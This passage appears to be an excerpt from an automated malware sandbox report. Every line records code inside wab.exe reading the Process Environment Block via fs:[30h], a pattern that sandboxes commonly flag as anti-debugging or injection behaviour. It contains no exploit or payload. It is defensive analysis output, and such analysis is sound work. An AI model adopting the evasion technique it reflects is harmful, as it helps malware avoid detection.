        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h]12_2_2024A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024A30B mov eax, dword ptr fs:[00000030h]12_2_2024A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020C310 mov ecx, dword ptr fs:[00000030h]12_2_2020C310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20230310 mov ecx, dword ptr fs:[00000030h]12_2_20230310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CF367 mov eax, dword ptr fs:[00000030h]12_2_202CF367
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20217370 mov eax, dword ptr fs:[00000030h]12_2_20217370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20217370 mov eax, dword ptr fs:[00000030h]12_2_20217370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20217370 mov eax, dword ptr fs:[00000030h]12_2_20217370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202B437C mov eax, dword ptr fs:[00000030h]12_2_202B437C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20292349 mov eax, dword ptr fs:[00000030h]12_2_20292349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020D34C mov eax, dword ptr fs:[00000030h]12_2_2020D34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020D34C mov eax, dword ptr fs:[00000030h]12_2_2020D34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5341 mov eax, dword ptr fs:[00000030h]12_2_202E5341
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209353 mov eax, dword ptr fs:[00000030h]12_2_20209353
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209353 mov eax, dword ptr fs:[00000030h]12_2_20209353
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov eax, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov eax, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov eax, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov ecx, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov eax, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029035C mov eax, dword ptr fs:[00000030h]12_2_2029035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DA352 mov eax, dword ptr fs:[00000030h]12_2_202DA352
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202433A0 mov eax, dword ptr fs:[00000030h]12_2_202433A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202433A0 mov eax, dword ptr fs:[00000030h]12_2_202433A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202333A5 mov eax, dword ptr fs:[00000030h]12_2_202333A5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h]12_2_2020E388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h]12_2_2020E388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020E388 mov eax, dword ptr fs:[00000030h]12_2_2020E388
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023438F mov eax, dword ptr fs:[00000030h]12_2_2023438F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023438F mov eax, dword ptr fs:[00000030h]12_2_2023438F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E539D mov eax, dword ptr fs:[00000030h]12_2_202E539D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20208397 mov eax, dword ptr fs:[00000030h]12_2_20208397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20208397 mov eax, dword ptr fs:[00000030h]12_2_20208397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20208397 mov eax, dword ptr fs:[00000030h]12_2_20208397
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2026739A mov eax, dword ptr fs:[00000030h]12_2_2026739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2026739A mov eax, dword ptr fs:[00000030h]12_2_2026739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CF3E6 mov eax, dword ptr fs:[00000030h]12_2_202CF3E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h]12_2_202203E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h]12_2_202203E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h]12_2_202203E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h]12_2_202203E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h]12_2_202203E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h]12_2_202203E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h]12_2_202203E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202203E9 mov eax, dword ptr fs:[00000030h]12_2_202203E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E53FC mov eax, dword ptr fs:[00000030h]12_2_202E53FC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022E3F0 mov eax, dword ptr fs:[00000030h]12_2_2022E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022E3F0 mov eax, dword ptr fs:[00000030h]12_2_2022E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022E3F0 mov eax, dword ptr fs:[00000030h]12_2_2022E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202463FF mov eax, dword ptr fs:[00000030h]12_2_202463FF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CC3CD mov eax, dword ptr fs:[00000030h]12_2_202CC3CD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h]12_2_2021A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h]12_2_2021A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h]12_2_2021A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h]12_2_2021A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h]12_2_2021A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A3C0 mov eax, dword ptr fs:[00000030h]12_2_2021A3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h]12_2_202183C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h]12_2_202183C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h]12_2_202183C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202183C0 mov eax, dword ptr fs:[00000030h]12_2_202183C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CB3D0 mov ecx, dword ptr fs:[00000030h]12_2_202CB3D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020E420 mov eax, dword ptr fs:[00000030h]12_2_2020E420
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020E420 mov eax, dword ptr fs:[00000030h]12_2_2020E420
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020E420 mov eax, dword ptr fs:[00000030h]12_2_2020E420
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020C427 mov eax, dword ptr fs:[00000030h]12_2_2020C427
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024A430 mov eax, dword ptr fs:[00000030h]12_2_2024A430
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20248402 mov eax, dword ptr fs:[00000030h]12_2_20248402
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20248402 mov eax, dword ptr fs:[00000030h]12_2_20248402
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20248402 mov eax, dword ptr fs:[00000030h]12_2_20248402
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023340D mov eax, dword ptr fs:[00000030h]12_2_2023340D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20211460 mov eax, dword ptr fs:[00000030h]12_2_20211460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20211460 mov eax, dword ptr fs:[00000030h]12_2_20211460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20211460 mov eax, dword ptr fs:[00000030h]12_2_20211460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20211460 mov eax, dword ptr fs:[00000030h]12_2_20211460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20211460 mov eax, dword ptr fs:[00000030h]12_2_20211460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h]12_2_2022F460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h]12_2_2022F460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h]12_2_2022F460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h]12_2_2022F460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h]12_2_2022F460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022F460 mov eax, dword ptr fs:[00000030h]12_2_2022F460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E547F mov eax, dword ptr fs:[00000030h]12_2_202E547F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023A470 mov eax, dword ptr fs:[00000030h]12_2_2023A470
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023A470 mov eax, dword ptr fs:[00000030h]12_2_2023A470
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023A470 mov eax, dword ptr fs:[00000030h]12_2_2023A470
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h]12_2_2021B440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h]12_2_2021B440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h]12_2_2021B440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h]12_2_2021B440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h]12_2_2021B440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021B440 mov eax, dword ptr fs:[00000030h]12_2_2021B440
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h]12_2_2024E443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h]12_2_2024E443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h]12_2_2024E443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h]12_2_2024E443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h]12_2_2024E443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h]12_2_2024E443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h]12_2_2024E443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E443 mov eax, dword ptr fs:[00000030h]12_2_2024E443
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023245A mov eax, dword ptr fs:[00000030h]12_2_2023245A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020645D mov eax, dword ptr fs:[00000030h]12_2_2020645D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CF453 mov eax, dword ptr fs:[00000030h]12_2_202CF453
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202164AB mov eax, dword ptr fs:[00000030h]12_2_202164AB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202434B0 mov eax, dword ptr fs:[00000030h]12_2_202434B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202444B0 mov ecx, dword ptr fs:[00000030h]12_2_202444B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029A4B0 mov eax, dword ptr fs:[00000030h]12_2_2029A4B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B480 mov eax, dword ptr fs:[00000030h]12_2_2020B480
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20219486 mov eax, dword ptr fs:[00000030h]12_2_20219486
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20219486 mov eax, dword ptr fs:[00000030h]12_2_20219486
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202104E5 mov ecx, dword ptr fs:[00000030h]12_2_202104E5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202B94E0 mov eax, dword ptr fs:[00000030h]12_2_202B94E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E54DB mov eax, dword ptr fs:[00000030h]12_2_202E54DB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CB52F mov eax, dword ptr fs:[00000030h]12_2_202CB52F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h]12_2_202BF525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h]12_2_202BF525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h]12_2_202BF525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h]12_2_202BF525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h]12_2_202BF525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h]12_2_202BF525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BF525 mov eax, dword ptr fs:[00000030h]12_2_202BF525
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024D530 mov eax, dword ptr fs:[00000030h]12_2_2024D530
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024D530 mov eax, dword ptr fs:[00000030h]12_2_2024D530
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h]12_2_2021D534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h]12_2_2021D534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h]12_2_2021D534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h]12_2_2021D534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h]12_2_2021D534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021D534 mov eax, dword ptr fs:[00000030h]12_2_2021D534
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20220535 mov eax, dword ptr fs:[00000030h]12_2_20220535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20220535 mov eax, dword ptr fs:[00000030h]12_2_20220535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20220535 mov eax, dword ptr fs:[00000030h]12_2_20220535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20220535 mov eax, dword ptr fs:[00000030h]12_2_20220535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20220535 mov eax, dword ptr fs:[00000030h]12_2_20220535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20220535 mov eax, dword ptr fs:[00000030h]12_2_20220535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5537 mov eax, dword ptr fs:[00000030h]12_2_202E5537
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h]12_2_2023E53E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h]12_2_2023E53E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h]12_2_2023E53E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h]12_2_2023E53E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E53E mov eax, dword ptr fs:[00000030h]12_2_2023E53E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20247505 mov eax, dword ptr fs:[00000030h]12_2_20247505
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20247505 mov ecx, dword ptr fs:[00000030h]12_2_20247505
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h]12_2_202E4500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h]12_2_202E4500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h]12_2_202E4500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h]12_2_202E4500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h]12_2_202E4500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h]12_2_202E4500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E4500 mov eax, dword ptr fs:[00000030h]12_2_202E4500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B562 mov eax, dword ptr fs:[00000030h]12_2_2020B562
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024656A mov eax, dword ptr fs:[00000030h]12_2_2024656A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024656A mov eax, dword ptr fs:[00000030h]12_2_2024656A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024656A mov eax, dword ptr fs:[00000030h]12_2_2024656A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024B570 mov eax, dword ptr fs:[00000030h]12_2_2024B570
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024B570 mov eax, dword ptr fs:[00000030h]12_2_2024B570
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20218550 mov eax, dword ptr fs:[00000030h]12_2_20218550
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20218550 mov eax, dword ptr fs:[00000030h]12_2_20218550
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h]12_2_202315A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h]12_2_202315A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h]12_2_202315A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h]12_2_202315A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202315A9 mov eax, dword ptr fs:[00000030h]12_2_202315A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202905A7 mov eax, dword ptr fs:[00000030h]12_2_202905A7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202905A7 mov eax, dword ptr fs:[00000030h]12_2_202905A7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202905A7 mov eax, dword ptr fs:[00000030h]12_2_202905A7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h]12_2_202A35BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h]12_2_202A35BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h]12_2_202A35BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A35BA mov eax, dword ptr fs:[00000030h]12_2_202A35BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CF5BE mov eax, dword ptr fs:[00000030h]12_2_202CF5BE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202345B1 mov eax, dword ptr fs:[00000030h]12_2_202345B1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202345B1 mov eax, dword ptr fs:[00000030h]12_2_202345B1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h]12_2_2023F5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h]12_2_2023F5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h]12_2_2023F5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h]12_2_2023F5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h]12_2_2023F5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h]12_2_2023F5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h]12_2_2023F5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h]12_2_2023F5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F5B0 mov eax, dword ptr fs:[00000030h]12_2_2023F5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20212582 mov eax, dword ptr fs:[00000030h]12_2_20212582
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20212582 mov ecx, dword ptr fs:[00000030h]12_2_20212582
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20244588 mov eax, dword ptr fs:[00000030h]12_2_20244588
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020758F mov eax, dword ptr fs:[00000030h]12_2_2020758F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020758F mov eax, dword ptr fs:[00000030h]12_2_2020758F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020758F mov eax, dword ptr fs:[00000030h]12_2_2020758F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E59C mov eax, dword ptr fs:[00000030h]12_2_2024E59C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029B594 mov eax, dword ptr fs:[00000030h]12_2_2029B594
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029B594 mov eax, dword ptr fs:[00000030h]12_2_2029B594
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202125E0 mov eax, dword ptr fs:[00000030h]12_2_202125E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h]12_2_2023E5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h]12_2_2023E5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h]12_2_2023E5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h]12_2_2023E5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h]12_2_2023E5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h]12_2_2023E5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023E5E7 mov eax, dword ptr fs:[00000030h]12_2_2023E5E7
